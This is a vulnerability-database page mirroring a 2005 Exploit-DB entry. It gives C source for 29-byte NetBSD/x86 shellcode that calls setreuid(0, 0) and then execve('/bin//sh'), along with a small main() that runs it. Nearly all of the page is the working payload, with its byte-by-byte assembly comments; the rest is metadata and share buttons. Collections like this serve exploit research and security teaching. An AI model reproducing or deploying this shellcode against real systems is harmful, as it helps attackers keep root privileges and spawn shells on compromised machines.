NetBSD/x86 - setreuid(0, 0) + execve("/bin//sh", ..., NULL) Shellcode (29 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1055470 漏洞类型
发布时间 2005-11-30 更新时间 2005-11-30
CVE编号 N/A CNNVD-ID N/A
漏洞平台 NetBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13472
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  minervini at neuralnoise dot com (c) 2005
 *  NetBSD/i386 2.0, setreuid(0, 0); execve("/bin//sh", ..., NULL);
 *  note: unsafe shellcode, but 29 bytes long;
 *  	  doesn't work if (eax & 0x40000000) != 0;
 */

#include <sys/types.h>
#include <stdio.h>
#include <string.h>

char scode[] =
  "\x99"                   // cltd   
  "\x52"                   // push   %edx
  "\x52"                   // push   %edx
  "\x52"                   // push   %edx
  "\x6a\x7e"               // push   $0x7e
  "\x58"                   // pop    %eax
  "\xcd\x80"               // int    $0x80
  "\x68\x2f\x2f\x73\x68"   // push   $0x68732f2f
  "\x68\x2f\x62\x69\x6e"   // push   $0x6e69622f
  "\x89\xe3"               // mov    %esp,%ebx
  "\x52"                   // push   %edx
  "\x54"                   // push   %esp
  "\x53"                   // push   %ebx
  "\x52"                   // push   %edx
  "\x34\x3b"               // xor    $0x3b,%al
  "\xcd\x80";              // int    $0x80

int main() {
   void (*code) () = (void *) scode;
   printf("length: %d\n", strlen(scode));
   code();
   return (0);
}

// milw0rm.com [2005-11-30]